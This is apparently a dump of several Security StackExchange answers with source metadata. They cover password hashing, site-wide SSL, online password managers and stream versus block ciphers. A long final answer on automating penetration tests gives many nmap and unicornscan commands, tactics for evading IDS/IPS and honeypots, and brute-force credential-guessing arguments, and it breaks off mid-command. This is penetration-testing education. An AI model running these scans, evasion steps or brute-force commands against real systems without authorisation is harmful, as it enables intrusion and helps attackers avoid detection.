FPGA will want to do that, and will find it difficult. Advantages of scrypt: A PC, i.e. exactly what the defender will use when hashing passwords, is the most efficient platform (or close enough) for computing scrypt. The attacker no longer gets a boost by spending his dollars on GPU or FPGA. One more way to tune the function: memory size. Drawbacks of scrypt: Still new (my own rule of thumb is to wait at least 5 years of general exposure, so no scrypt for production until 2014 - but, of course, it is best if other people try scrypt in production, because this gives extra exposure). Not as many available, ready-to-use implementations for various languages. Unclear whether the CPU / RAM mix is optimal. For each of the pseudo-random RAM accesses, scrypt still computes a hash function. A cache miss will be about 200 clock cycles, one SHA-256 invocation is close to 1000. There may be room for improvement here. Yet another parameter to configure: memory size. OpenPGP Iterated And Salted S2K I cite this one because you will use it if you do password-based file encryption with GnuPG . That tool follows the OpenPGP format which defines its own password hashing functions, called "Simple S2K", "Salted S2K" and " Iterated and Salted S2K ". Only the third one can be deemed "good" in the context of this answer. It is defined as the hash of a very long string (configurable, up to about 65 megabytes) consisting of the repetition of an 8-byte salt and the password. As far as these things go, OpenPGP's Iterated And Salted S2K is decent; it can be considered as similar to PBKDF2, with less configurability. You will very rarely encounter it outside of OpenPGP, as a stand-alone function. Unix "crypt" Recent Unix-like systems (e.g. Linux), for validating user passwords, use iterated and salted variants of the crypt() function based on good hash functions, with thousands of iterations. This is reasonably good. Some systems can also use bcrypt, which is better. The old crypt() function, based on the DES block cipher , is not good enough: It is slow in software but fast in hardware, and can be made fast in software too but only when computing several instances in parallel (technique known as SWAR or "bitslicing"). Thus, the attacker is at an advantage. It is still quite fast, with only 25 iterations. It has a 12-bit salt, which means that salt reuse will occur quite often. It truncates passwords to 8 characters (characters beyond the eighth are ignored) and it also drops the upper bit of each character (so you are more or less stuck with ASCII). But the more recent variants, which are active by default, will be fine. Bad Password Hashing Functions About everything else, in particular virtually every homemade method that people relentlessly invent. For some reason, many developers insist on designing function themselves, and seem to assume that "secure cryptographic design" means "throw together every kind of cryptographic or non-cryptographic operation that can be thought of". See this question for an example. The underlying principle seems to be that the sheer complexity of the resulting utterly tangled mess of instruction will befuddle attackers. In practice, though, the developer himself will be more confused by his own creation than the attacker. Complexity is bad. Homemade is bad. New is bad. If you remember that, you'll avoid 99% of problems related to password hashing, or cryptography, or even security in general. Password hashing in Windows operating systems used to be mindbogglingly awful and now is just terrible (unsalted, non-iterated MD4). Key Derivation Up to now, we considered the question of hashing passwords . A closely related problem is transforming a password into a symmetric key which can be used for encryption; this is called key derivation and is the first thing you do when you "encrypt a file with a password". It is possible to make contrived examples of password hashing functions which are secure for the purpose of storing a password validation token, but terrible when it comes to generating symmetric keys; and the converse is equally possible. But these examples are very "artificial". For practical functions like the one described above: The output of a password hashing function is acceptable as a symmetric key, after possible truncation to the required size. A Key Derivation Function can serve as a password hashing function as long as the "derived key" is long enough to avoid "generic preimages" (the attacker is just lucky and finds a password which yields the same output). An output of more than 100 bits or so will be enough. Indeed, PBKDF2 and scrypt are KDF, not password hashing function -- and NIST "approves" of PBKDF2 as a KDF, not explicitly as a password hasher (but it is possible, with only a very minute amount of hypocrisy, to read NIST's prose in such a way that it seems to say that PBKDF2 is good for hashing passwords). Conversely, bcrypt is really a block cipher (the bulk of the password processing is the "key schedule") which is then used in CTR mode to produce three blocks (i.e. 192 bits) of pseudo-random output, making it a kind of hash function. bcrypt can be turned into a KDF with a little surgery, by using the block cipher in CTR mode for more blocks. But, as usual, we cannot recommend such homemade transforms. Fortunately, 192 bits are already more than enough for most purposes (e.g. symmetric encryption with GCM or EAX only needs a 128-bit key). Miscellaneous Topics How many iterations? As much as possible! This salted-and-slow hashing is an arms race between the attacker and the defender. You use many iterations to make the hashing of a password harder for everybody . To improve security, you should set that number as high as you can tolerate on your server, given the tasks that your server must otherwise fulfill. Higher is better. Collisions and MD5 MD5 is broken : it is computationally easy to find a lot of pairs of distinct inputs which hash to the same value. These are called collisions . However, collisions are not an issue for password hashing . Password hashing requires the hash function to be resistant to preimages , not to collisions. Collisions are about finding pairs of messages which give the same output without restriction , whereas in password hashing the attacker must find a message which yields a given output that the attacker does not get to choose. This is quite different. As far as we known, MD5 is still (almost) as strong as it has ever been with regards to preimages (there is a theoretical attack which is still very far in the ludicrously impossible to run in practice). The real problem with MD5 as it is commonly used in password hashing is that it is very fast, and unsalted. However, PBKDF2 used with MD5 would be robust. You should still use SHA-1 or SHA-256 with PBKDF2, but for Public Relations. People get nervous when they hear "MD5". Salt Generation The main and only point of the salt is to be as unique as possible. Whenever a salt value is reused anywhere , this has the potential to help the attacker. For instance, if you use the user name as salt, then an attacker (or several colluding attackers) could find it worthwhile to build rainbow tables which attack the password hashing function when the salt is "admin" (or "root" or "joe") because there will be several, possibly many sites around the world which will have a user named "admin". Similarly, when a user changes his password, he usually keeps his name, leading to salt reuse. Old passwords are valuable targets, because users have the habit of reusing passwords in several places (that's known to be a bad idea, and advertised as such, but they will do it nonetheless because it makes their life easier), and also because people tend to generate their passwords "in sequence": if you learn that Bob's old password is "SuperSecretPassword37", then Bob's current password is probably "SuperSecretPassword38" or "SuperSecretPassword39". The cheap way to obtain uniqueness is to use randomness . If you generate your salt as a sequence of random bytes from the cryptographically secure PRNG that your operating system offers ( /dev/urandom , CryptGenRandom() ...) then you will get salt values which will be "unique with a sufficiently high probability". 16 bytes are enough so that you will never see a salt collision in your life, which is overkill but simple enough. UUID are a standard way of generating "unique" values. Note that "version 4" UUID just use randomness (122 random bits), like explained above. A lot of programming frameworks offer simple to use functions to generate UUID on demand, and they can be used as salts. Salt Secrecy Salts are not meant to be secret; otherwise we would call them keys . You do not need to make salts public, but if you have to make them public (e.g. to support client-side hashing), then don't worry too much about it. Salts are there for uniqueness. Strictly speaking, the salt is nothing more than the selection of a specific hash function within a big family of functions. "Pepper" Cryptographers can never let a metaphor alone; they must extend it with further analogies and bad puns. "Peppering" is about using a secret salt, i.e. a key. If you use a "pepper" in your password hashing function, then you are switching to a quite different kind of cryptographic algorithm; namely, you are computing a Message Authentication Code over the password. The MAC key is your "pepper". Peppering makes sense if you can have a secret key which the attacker will not be able to read. Remember that we use password hashing because we consider that an attacker could grab a copy of the server database, or possible of the whole disk of the server. A typical scenario would be a server with two disks in RAID 1 . One disk fails (electronic board fries - this happens a lot). The sysadmin replaces the disk, the mirror is rebuilt, no data is lost due to the magic of RAID 1. Since the old disk is dysfunctional, the sysadmin cannot easily wipe its contents. He just discards the disk. The attacker searches through the garbage bags, retrieves the disk, replaces the board, and lo! he has a complete image of the whole server system, including database, configuration files, binaries, operating system... the full monty, as the British say. For peppering to be really applicable, you need to be in a special setup where there is something more than a PC with disks; you need an HSM . HSM are very expensive, both in hardware and in operational procedure. But with an HSM, you can just use a secret "pepper" and process passwords with a simple HMAC (e.g. with SHA-1 or SHA-256). This will be vastly more efficient than bcrypt/PBKDF2/scrypt and their cumbersome iterations. Also, usage of an HSM will look extremely professional when doing a WebTrust audit . Client-side hashing Since hashing is (deliberately) expensive, it could make sense, in a client-server situation, to harness the CPU of the connecting clients. After all, when 100 clients connect to a single server, the clients collectively have a lot more muscle than the server. To perform client-side hashing, the communication protocol must be enhanced to support sending the salt back to the client. This implies an extra round-trip, when compared to the simple client-sends-password-to-server protocol. This may or may not be easy to add to your specific case. Client-side hashing is difficult in a Web context because the client uses JavaScript, which is quite anemic for CPU-intensive tasks. In the context of SRP , password hashing necessarily occurs on the client side. Conclusion Use bcrypt. PBKDF2 is not bad either. If you use scrypt you will be a "slightly early adopter" with the risks that are implied by this expression; but it would be a good move for scientific progress ("crash dummy" is a very honourable profession). | {
"source": [
"https://security.stackexchange.com/questions/211",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/33/"
]
} |
258 | What are the pros and cons of encrypting all HTTP traffic for the whole site through SSL, as opposed to SSL on just the login page? | Since most of the other answers here deal with the downsides of site-wide SSL (mainly performance issues - btw these can easily be mitigated by offloading the SSL termination, either to an SSL proxy box, or an SSL card), I will point out some issues with having only the login page over SSL, then switching to non-SSL: The rest of the site is not secured (though this is obvious, sometimes the focus is too much on just the user's password). The user's session id must be transmitted in the clear, allowing it to be intercepted and used, and thus enabling the bad guys to impersonate your users. (This is mostly what the Firesheep hubbub was about). Because of the previous point, your session cookies cannot be marked with the secure attribute, which means that they can be retrieved in additional ways. I have seen sites with login-only-SSL, and of course neglect to include in that the Forgot-password page, the Change-password page, and even the Registration page... The switch from SSL to non-SSL is often complicated, can require complex configuration on your webserver, and in many cases will pop up a scary message for your users. If it's ONLY the login page, and f.e. there is a link to the login page from your sites home page - what is to guarantee that someone won't spoof/modify/intercept your homepage, and have it point to a different login page? Then there is the case where the login page itself is not SSL, but only the SUBMIT is - since that's the only time the password is sent, so that should be safe, right? But in truth that removes from the user the ability to ensure ahead of time that the password is being sent to the correct site, until its too late. (E.g. Bank of America, and many others). | {
"source": [
"https://security.stackexchange.com/questions/258",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/45/"
]
} |
279 | Can online password managers be used for storing and managing passwords? I mean from the security point of view. I understand that those systems can be different and some deserves more trust than the other, but what I mean is the whole idea of public service for storing personal passwords. Is it viable in its essence? About a year ago I signed up for one such service ( Passpack ). It seems reliable and professional, but I am still afraid to start really using it and upload my numerous passwords there. And it's not because I'm not willing to upgrade to paid account; I'm just very careful and doubtful. Am I wrong? | If you're asking in theory , can such a system be built securely? My answer would be yes, absolutely, but it's not trivial work - and most likely would be done wrong (depending on who designed and built it). If you're asking about existing services, while I'm not familiar with the one you mentioned, in general I don't know of any good, reliable, secure systems for this. If you're asking, how can I tell if a specific system is secure and reliable? , well, ya can't. Unless you (or an expert you trust, and is proficient enough in the given technology) performed an in-depth code review, penetration test, and other security reviews. And periodic deployment and server examinations. And so forth... And no, getting a 3rd party certification such as HackerSafe (not even PCI:DSS) is not good enough, not for you to entrust the keys to your most sensitive data. (Unless its a service you know well enough to trust ). | {
"source": [
"https://security.stackexchange.com/questions/279",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3/"
]
} |
334 | Encryption algorithms such as Blowfish,AES,RC4,DES and Seal are implemented in one of two categories of ciphers. What are the advantages/disadvantages to the type of ciphers? | While both are symmetric ciphers, stream ciphers are based on generating an "infinite" cryptograpic keystream, and using that to encrypt one bit or byte at a time (similar to the one-time pad), whereas block ciphers work on larger chunks of data (i.e. blocks) at a time, often combining blocks for additional security (e.g. AES in CBC mode). Stream ciphers are typically faster than block, but that has it's own price. Block ciphers typically require more memory, since they work on larger chunks of data and often have "carry over" from previous blocks, whereas since stream ciphers work on only a few bits at a time they have relatively low memory requirements (and therefore cheaper to implement in limited scenarios such as embedded devices, firmware, and esp. hardware). Stream ciphers are more difficult to implement correctly, and prone to weaknesses based on usage - since the principles are similar to one-time pad, the keystream has very strict requirements. On the other hand, that's usually the tricky part, and can be offloaded to e.g. an external box. Because block ciphers encrypt a whole block at a time (and furthermore have "feedback" modes which are most recommended), they are more susceptible to noise in transmission, that is if you mess up one part of the data, all the rest is probably unrecoverable. Whereas with stream ciphers bytes are individually encrypted with no connection to other chunks of data (in most ciphers/modes), and often have support for interruptions on the line. Also, stream ciphers do not provide integrity protection or authentication, whereas some block ciphers (depending on mode) can provide integrity protection, in addition to confidentiality. Because of all the above, stream ciphers are usually best for cases where the amount of data is either unknown, or continuous - such as network streams. Block ciphers, on the other hand, or more useful when the amount of data is pre-known - such as a file, data fields, or request/response protocols, such as HTTP where the length of the total message is known already at the beginning. | {
"source": [
"https://security.stackexchange.com/questions/334",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/59/"
]
} |
373 | What order do typical open-source penetration tests operate? Which tools are run first, second, third -- and how do you control them? Does one simply use Metasploit RC files? A network vulnerability scanner in a special way? A command-line, custom, or headless web application security scanner? Any other ways (or even ideas) to speed up penetration-tests that you would be willing to share? Are there open-source projects to help with this process (besides Metasploit RC files or the `save' command under the MSF console)? | The Metasploit Framework is my go-to tool for pentest automation still to this day, however, I do like what I've seen of CORE INSIGHT and Immunity Security SWARM. There are a few tools such as Loki (or the older Yersinia tool), intrace, Chiron , mana-toolkit, mitmf, bettercap, and Responder.py that must be run outside of the Metasploit framework, but so many things can be done inside msfconsole these days (`load kiwi' comes to mind). If you want to see some amazing resources, check out this document which covers performing the full PTES using Metasploit. Metasploit is catching up a little bit here and there (to nearly every tool and technique in existence!), such as the auxiliary/server (and capture) modules. However, many questions remain, such as performance comparisons between auxiliary/spoof/arp/arp_poisoning, arpspoof, macof, arp-sk, nemesis, and ettercap. Does auxiliary/sniffer/psnuffle work any differently than dsniff? What's the difference between Squirtle , auxiliary/server/http_ntlmrelay, and auxiliary/server/capture/http_ntlm? How does http_javascript_keylogger compare to BeEF ? How do auxiliary/spoof/llmnr, auxiliary/spoof/nbs, auxiliary/server/wpad and auxiliary/server/capture/smb compare to Responder.py? Clearly others are simply superior, but I'd like to recode them (or see someone do this) to be part of MSF. For example, shouldn't dns2proxy (from sslstrip2 's author) features exist in auxiliary/server/fakedns? Much of the early work in network penetration testing is done with either nmap or unicornscan, although pbscan , zmap, and masscan have gained a lot of ground in recent years. In particular, dnmap is a sleek approach. There is even a web interface to dnmap called Minions . Here are a few flags I enjoy with regards to nmap: Slow scan (but not too slow), evades IDS, and gives the reason why the packets didn't make their destinations. Best performed one port at a time with data-length or string set when the destination protocol or port isn't known by nmap. Use robtex and csrecon to check your target IP prefixes. Try to identify one or two ports you can leverage that are not web servers, but that have historically been vulnerable to remote code exploitation (N.B., you may need to correlate this data with cvedetails.com or exploitsearch.net). You will notice I have chosen TCP port 623 (IPMI RMCP, an already slow-to-respond service that benefits from these slow scans) in the example, but you could easily change this (although I don't recommend obvious ones such as SSH or RDP -- at least check the Shodan HoneyScore before challenging these). -T1 --max-retries 0 --randomize-hosts --reason -n -Pn -sT -p 623 HTTP or TLS targets will typically run the default ports, so I like to SYN scan them first before scanning other HTTP/TLS targets on non-default ports. The second command will be very slow, but it will likely go under the radar (especially if you use this patch taken from this blog post ), allowing full pivot to the web layer undetected. If you find that the web-related ports are open but the http-title script fails, then something is amiss -- potential honeypot warning ! Look for correlation between an open port and a valid, corresponding HTML title element tag that matches the service name and purpose. If a particular IP always responds to any port, then use nmap's --exclude <ip> directive or --excludefile <filename> if you have a list of IPs (similar to nmap's -iL flag). -T1 --max-retries 0 --randomize-hosts --script http-title --reason -n -Pn -r -p 80,443 -T1 --max-retries 0 --randomize-hosts --script +http-title --open -n -Pn -p 81,457,902,995,1100,1128,1241,1581,1883,1944,2301,2375,2381,3010,3037,3128,3780,3790,3872,4000-4002,4100,4567,4848,5000,5250,5800-5802,5814,5986,6060,6405,7000-7002,7080,7181,7272,7443,7510,7770,7778,8000-8001,8008,8014,8028,8040,8081,8085,8088-8091,8095,8140,8161,8180,8200,8222,8300,8400,8443,8500,8776,8834,8880,8883,8888,8980,8999-9000,9002,9060,9080,9084,9090,9191,9292,9389,9443,9495,9990,9999,30821,50000 If everything is in order, switch to faster scans and check for IDS/IPS. You'll know something went wrong when all of your scans stop, but you can be a little more efficient about it by using nmap's traceroute flag (or combine it with the firewalk script), intrace, lft , ttl-mon.py , or osstmm-afd to try and map out these systems. Typically, firewalls that include IPS/IDP functionality, network-based IPS/IDP appliances, UTM, NGFW, and similar network-stack gateways will only sample the traffic to be analyzed every 8-11 seconds. Longer delays between port scans (e.g., the 15-second default in nmap T1 scanning, or by setting a specific 12-second delay in T2 scans) and the lack of parallelization are typically what make these slower scans sneak by intrusion detection of all kinds. Repeat traffic, such as that which is directed to a single port, could also cause intrusion detection bells to go off, identifying traffic as an attack or automatically rejecting it. During the sampling period, intrusion detection might also look for sequential ports. There are a variety of factors to try and identify or play with. Thus, the next nmap flags seen below should be modified to test for this series of IDS-identification strategies. If the first test case (T2 scan with 12-second delay, no retries, and no sequential ports) gets by but the second does not, then you will want to figure out why. Nmap's packet-trace and traceroute capabilities are highly suggested, but other tools such as hping3 or nping may come in useful to support this effort. If you find your traffic blocked (e.g., responses completely stop), you may need to switch the source public-IP (or LAN IP) you're coming from, so I suggest that you run most of these at Starbucks or off your primary, usual location (dnmap will likely also help here). Try not to hit any honeynets (e.g., Fortinet FortiGate, TrapX DeceptionGrid, etc) either, or at least identify them so that you can exclude them in future scans. The best way to avoid these traps is to leverage that scans.io and SHODAN data (and knowledge about the target environment, the kinds of technologies in use -- more useful when performing internal network scans), grab a scoreful of ports (nmap or dnmap at increasing speeds, each with 20 or so unique ports), and avoid the overly-shiny services that are potential honeypots, i.e., 21-23, 25, 53, 110, 135-139, 445, 1337, 1433, 1723, 3306, 3389, 5060-5061, 5800, 5900, 8080, 10000, 31337, and 44443 (N.B., DON'T scan these port numbers yet!). -T2 --scan-delay 12s --max-retries 0 --randomize-hosts --open -n -Pn -p26,66,79,113,389,407,465 -T2 --scan-delay 9s --max-retries 1 --randomize-hosts --open -n -Pn -p512-514,523-524 -T2 --max-retries 3 --randomize-hosts --open -n -Pn -p548,554,587,593,873,993,1026,1050,1080,1099,1158,1344,1352,1521,1604,1720,2202,2302,2383 --max-rate 20 --max-parallelism 2 --max-retries 3 --randomize-hosts --open -n -Pn -p2628,2869,2947,3000,3031,3260,3478,3500,3632,3689,4369,5019,5040,5222,5353,5357,5432,5560,5631-5632 --max-rate 40 --max-parallelism 4 --max-retries 3 --randomize-hosts --open -n -Pn -p5666,5672,5679,5850,5920,5984-5985,6000-6005,6379,6481,6666,7019,7210,7634 --max-rate 80 --max-parallelism 8 --max-retries 3 --randomize-hosts --open -n -Pn -p8000,8009-8010,8834,9160,9999,11211,12000,17185,13722,19150,27017,30718,35871,49152,50030,50060,50070,50075,50090,52822,52869,60010,60030,64623 Written below is the next level of nmap scanning (default speed, no randomizing because of the qscan latency checks), giving you lots of detail and potential for movement. Use mostly port numbers you know are open, although select one port that is potentially not open (especially ones in the past that had ambiguous results). Avoid using dnmap or other inefficiencies that will break the qscan script. TCP (typically HTTP or SSL/TLS) ports could be behind reverse-caching proxies, load balancers, redirected at the network level, or similar. The qscan script should help identify these situations, although you will likely want to supplement them with other tools such as halberd (or additional NSE scripts such as http-affiliate-id and http-favicon). In this phase, you can use either IP prefixes, hostnames, or a combination. I suggest using one strong tool here, such as blacksheepwall. Be careful when targeting hostnames because Passive DNS sensors will give away your location and/or intentions much more easily than you think, leading to blocks similar to IPS or WAF (and at this point you will need to be able to distinguish between those three, as well as other defensive countermeasures). Keep testing all ports in the manner directly above until you've exhausted what you already know about the target network(s) and domains. If you have a target SSL/TLS port, the duplicates script will help you understand when a single host is speaking on multiple IPs or networks (typically multihomed). --script qscan --max-retries 7 --reason -Pn --version-intensity 0 -sV -p80,(other found-TCP ports)
--script qscan,duplicates,ssl-cert --max-retries 7 -v --reason -Pn -sV --version-all -p80,443,(others previously-found) Follow this line of thinking with some single port checks using a bad TCP checksum. Utilize your knowledge of the past and build on it. Before you proceed, make certain you have a good idea about the network paths and internals of every packet you send, and predict the responses from this point on out. If you want to build a little extra knowledge at this stage, you might want to use different tools, such as pbscan, portbunny, masscan, zmap, or unicornscan (the -w file.pcap flag could be repurposed here to allow for packet capture analysis much like MSF's pcap_log, but I don't necessarily suggest either approach as cool as they initially sound). If you do have a way (preferably a separate, inline system so that the disk I/O, CPU, and memory usage doesn't affect your scans) to perform packet capture, typically you will want a tool such as netsniff-ng to save pcaps (or a different tool if you require pcapng) and then process the results with p0f and/or PRADS. Fingerprinting can get complex, and there are a few tools besides nmap that you will likely want to leverage at this stage. Targeting port-specific versions isn't necessary quite yet, although it can be accomplished here. I suggest going heavy on the OS-level fingerprinting with "just enough" service identification to correlate. There are old techniques (such as a fork of nmap called cron-os ) that should be ported to a newer tool with a fp database refresh to modern platforms (which is why I suggested p0f and PRADS earlier -- they tend to keep up with the constant change of technologies). Rapid7 has a big-data project for service fingerprinting, recog . Nmap's service versioning is only average when compared to tools such as amap, and there are many point-solution tools such as fpdns, ntp-fingerprint.pl, info2cpe, et al. Vuln scanners such as Nessus incorporate hmap (an HTTP fingerprinter), but there are many tools in that space as well (httprint, httprecon). It's annoying that OS fingerprinting and service versioning are highly problematic. I suggest you do the best you can with the methods and tools I described. --script qscan --max-retries 7 --badsum -v -O --osscan-guess --max-os-tries 1 --reason --send-ip --version-intensity 0 -sV -p80,(at least one closed port) If, and when you do, run into any obvious IPS or other blocks, see the section far below which mentions sniffjoke and other advanced evasion techniques (AETs). If you can actually fingerprint the system(s) blocking your traffic then your best bet is to run a sniffjoke client/server pair in another similar environment where you have server access already (N.B., this could be from a previous pen test or from a lab or mock environment). The above badsum trick should preempt most IPS systems. Other techniques we've been through may have also uncovered these blocking systems. If you find a good AET then you will likely want to run all of your previous port scans over again to see if you have similar results. If you feel that SYN traffic is being throttled (one way to check is to use nmap against a bunch of known-open ports with full TCP connects and the same ports with standard SYN-only), see the below section about SYN-cookie evasion as well as the even-further section on using tcptrace to detect such issues. Scan a few UDP ports, but check with a few different tools to be sure. Learn how to import Nmap data to MSF in order to leverage hosts -R in modules like empty_udp (but modify the script to remove 1-1024,2049,5060,5061). We aren't checking any low-range ports because of honeypots, intrusion detection, logging, or other inconsistencies at this time. If any UDP ports are open, this knowledge should supplement what we already know about the live TCP ports on this network. If, because of past knowledge about the target types (from OS or version detection) or target environment, you feel that you could gain more knowledge by scanning for IP protocols such as SCTP, ICMP, IGMP, or otherwise -- then, be careful, consider the consequences, and send out a few probes to verify or build on that knowledge. --max-rate 100 --max-retries 0 --randomize-hosts --reason -Pn -sUV --version-all -p500,523,623,1604,1645,1812,5353,5632,6481,6502,10080,17185 unicornscan 10.0.0.0/24:500,523,1604,1701,1812,2000,3478,5353,5632,10080-10081 -Iv -mU for i in ike db2 citrix net-support netop ; do udp-proto-scanner.pl -p $i 10.0.0.0/24 ; done -T2 --scan-delay 1s --max-retries 0 --randomize-hosts --reason -n -Pn -sO -p132 --max-rate 400 --max-retries 0 --randomize-hosts --reason -n -Pn -sY -p1167,1812,1813,2225,2427,2904,2905,2944,2945,3097,3565,3863,3864,3868,4739,4740,5090,5091,5672,5675,6704,6705,6706,7626,8471,9082,9084,9900,9901,9902,14001,20049,29118,29168,29169,36412,36422 -T2 --scan-delay 1s --max-retries 0 --randomize-hosts --reason -n -Pn -sO -p1 -T2 --scan-delay 1s --max-retries 0 --randomize-hosts --send-ip -n -PM -sn -T2 --scan-delay 1s --max-retries 0 --randomize-hosts --reason -n -Pn -sO -p2 -T2 --scan-delay 1s --max-retries 0 --randomize-hosts --send-ip -n -PP -sn -T2 --scan-delay 1s --max-retries 0 --randomize-hosts --reason -n -Pn -sO -F --exclude-ports 1,2,6,17,132 -T2 --scan-delay 1s --max-retries 0 --randomize-hosts --reason -n -Pn -sO --exclude-ports 1,2,6,17,132 --data-length 3 To be absolutely pedantic, run the below on every active host that responded to anything from past scans. -T2 --max-scan-delay 90ms --max-retries 9 -v -O --osscan-guess -n --send-ip -PE (or -PP if successful and/or -PM if also successful) -sTUV -pT:(at least one closed port but also one open if possible),U:(as T:) --version-all After this most-recent run, you must know nearly everything you can about each host, each port -- it should be obvious to you if there is a honeypot or IDS/IPS/IDP/etc. You'll be able to group them into categories even if not absolutely sure, e.g., "probably Cisco", "flavor of Unix", "definitely IP phones or softphones of some kind", or "unknown hosts but these match a certain profile even though they have differing ports open". You feel ready to start vulnerability analysis and exploitation against these hosts and their identified and/or unidentified ports. You will need to add ports previously found to the following nmap port list so that you get a suitable Nmap XML file for importing into Metasploit or querying with metasploitHelper . Be sure to add TCP/SCTP ports to the "T:" section and UDP ports to the "U:" section. --min-rate 100 --max-rate 400 --min-parallelism 16 --max-retries 9 --defeat-rst-ratelimit -sUS -n -Pn -pT:0,1,19,42,49,85,105,111,143,264,402,444,446,502,515,631,689,705,783,888,910,912,921,998,1000,1099,1211,1220,1533,1582,1617,1755,1811,1900,2000,2001,2067,2100,2103,2207,2362,2380,2525,2940,2947,2967,3050,3057,3200,3217,3299,3460,3465,3628,3690,3817,4322,4444,4659,4672,4679,5038,5051,5093,5168,5227,5466,5498,5554,5555,6050,6070,6080,6101,6106,6112,6503,6504,6542,6660,6661,6905,6988,7021,7071,7144,7414,7426,7579,7580,7777,7787,8020,8023,8030,8082,8087,8503,8787,8812,8899,9100,9200,9256,9390,9391,9788,9855,10001,10008,10050,10051,10202,10203,10616,10628,11000,11234,12174,12203,12221,12345,12397,12401,13364,13500,16102,18881,19810,20010,20031,20034,20101,20111,20171,20222,22222,23472,26000,26122,27000,27960,28784,30000,31001,32764,34205,34443,38080,38292,40007,41025,41080,41523,41524,44334,44818,46823,46824,50001,50013,55553,57772,62514,65535,U:19,42,49,69,111,161,631,1900,2049,2362,7777 -oX nmap_target1.xml If you find a good target, you may want to utilize custom Metasploit resources (or "rc") files that consist of notes on modules, their settings, and how to run them. You can find port-number specific rc files here , which can get you on the fast path to a shell. It may require some troubleshooting, but attacking the infrastructure this early on could indicate IPS (network or host) presence or lack thereof. It could also get your IP address blocked, so proceed with caution. You also might want to run some of these port-specific NSE scripts , some of which have important script-args and other tuneables. If you already know for sure that a port is open, or even confident in the target OS/service, then you might as well do something to get more information about their runtime states. Your call, but at this stage in the testing automation you will definitely need to increase the information available to you for decision advantage. Another possibility is to pivot to the web layer, which typically involves running carbonator after a little nmap and nikto action (N.B., you will want to modify your nikto.conf to modify the user agent to one of a normal web browser and perhaps comment out the two mutate lines). You will also want to discover more hostnames and IP prefixes at this time (domaincrawler.com, fierce, knock, dnsmap, and subbrute will help with subdomains and dnsrecon should handle all of the rest). If you have tons of targets then you may want to use webshot to drop images that you can sort through and triage your target selections. If you definitely know there is an IPS or WAF in place, then you may want to switch tactics. -Pn -p 80 --version-all -sV --script "http-waf*",http-devframework,http-enum,http-vhosts -oG - | nikto.pl -h - -Tuning x04689c -D 1 -output nikto.xml -Pn -p 443 --version-all -sV --script "http-waf*",http-devframework,http-enum,http-vhosts -oG - | nikto.pl -h - -ssl -Tuning x04689c -D 1 -output niktotls.xml Now is the time to engage any anti-IDS mechanisms (e.g., sniffjoke, fragroute , and Evader ) or run any last-minute SYN-cookie , IDS, IPS, and WAF detection checks. Finally, go for it! No sense in scanning a single port or small set of ports at this point. --script banner-plus --min-rate 450 --min-parallelism 20 --max-retries 5 --defeat-rst-ratelimit -n -Pn -p- unicornscan 10.0.0.0/24:a -D -L 20 -r 450 -Iv -mU unicornscan 10.0.0.0/24:9,42,49,67,88,135,139,162,213,259,260,407,445,464,514,517-523,546,631,657,826,829,1069,1194,1558,1645-1646,1900,1967,2055,2362,2427,2727,2746,3001,3283,3401,3544,4045,4500,4665,5060,5350,5351,5355,5405,5432,6481,6502,8905,8906,9999,17185,18233,26198,27444,32822-32823,34555,41250,47545,49152,49599,54321 -r 450 -Iv -mU The above rates (--min-rate in nmap and -r in unicornscan) are measured in packets-per second (pps) and can be modified up to 10000 when on a local network or other ideal conditions. There are patches to change nmap's scan rate dynamically (interactively) here (amazing when combined with tcptrace.org looking for retransmissions and modifying either the min-rate, max-rate, interactive equivalents, min-parallelism, min-hostgroup, or max-retries until maximum bandwidth is acheived). It is difficult to get nmap into best-fit approach for bulk SYN or UDP scanning, even when using pedantic min-hostgroup, min-parallelism, and min-rate parameters. This is why many people turn to unicornscan, zmap, or masscan. If your target networks and services have very reliable and consistent round-trip times in their server responses (or if you have the time and patience to figure out the network characteristics), nmap/dnmap may be your best bet for tooling consistency if nothing else. You may need to verify new IPs, hostnames, or ports that you haven't seen in the past (such as the honeypot ports we avoided earlier, including SCTP ports 5060-5061 with -sY). Go back to the stage where you ran qscan and retry scenarios using the new information. Continue to check for honeypots by using additional techniques such as Metasploit's detect_kippo module. Be sure to rerun metasploitHelper if applicable. Keep track of all of your information, perhaps by using Dradis, MagicTree, discover.sh XML to CSV conversions, Lunarline VSC, Prolific Solutions proVM Auditor, Cisco Kvasir, or FishNet LAIR. These are better alternatives to Notepad, etc because they are penetration-test data aware. Similar to earlier, you may find that the duplicates script helps identify multihomed hosts. Common scenarios include Windows machine with or without SSL/TLS -- or possibly a non-Windows machine running SSH, SSL/TLS, or both (although it is possible that a Windows host could be running SSH, but that's a severely strange corner case). --script qscan,duplicates,nbstat,ssl-cert --max-retries 7 -v -O --osscan-guess --max-os-tries 1 --reason -Pn -sSUV --version-all -pT:135,139,443,445,U:137 --script qscan,duplicates,nbstat --max-retries 7 -v -O --osscan-guess --max-os-tries 1 --reason -Pn -sSUV --version-all -pT:135,139,445,U:137 --script qscan,duplicates,ssh-hostkey --max-retries 7 -v -O --osscan-guess --max-os-tries 1 --reason -Pn -sV --version-all -p22 --script qscan,duplicates,ssh-hostkey,ssl-cert --max-retries 7 -v -O --osscan-guess --max-os-tries 1 --reason -Pn -sV --version-all -p22,443 If you find any open ports with services (or apps of any kind) that require any form of authentication, then you will want to read and configure the protocol-specific scripts, but generically your nmap/dnmap command-line arguments should look like: --min-rate 100 --max-retries 5 -n -Pn --script brute,creds-summary --script-args unsafe,brute.mode=pass,userdb=usernames.lst,passdb=passwords.lst,brute.firstOnly,brute.guesses=2 --version-all -sV (-sUV or -sUSV, if appropriate) The above could be performed with dnmap using a different passwords.lst file on each server in order to increase attempts, to brute from different IP addresses, or a variety of other scenario-dependent options. Finally, let's talk about how nmap/dnmap can really shine -- by bringing it all together after you know that SYN scanning works, you have UDP probes figured out (note that many of the below are missing in the nmap-payloads, nmap-service-probes, Unicornscan etc/payloads.conf, and udp-proto-scanner.conf files -- so you may have to create them manually!) and that IDS/IPS isn't going to be a bother for your automation. Let's say you aren't just on a coffee break, you can't take "just another nap", and your significant other demands some attention and a normal 8-hour sleep routine. Well, fire up nmap/dnmap this way and you'll get some great results for when you come back to the console! --min-rate 100 --max-retries 5 --defeat-rst-ratelimit --randomize-hosts --open -Pn -v -O --osscan-guess --max-os-tries 1 -sUSV --version-all --script 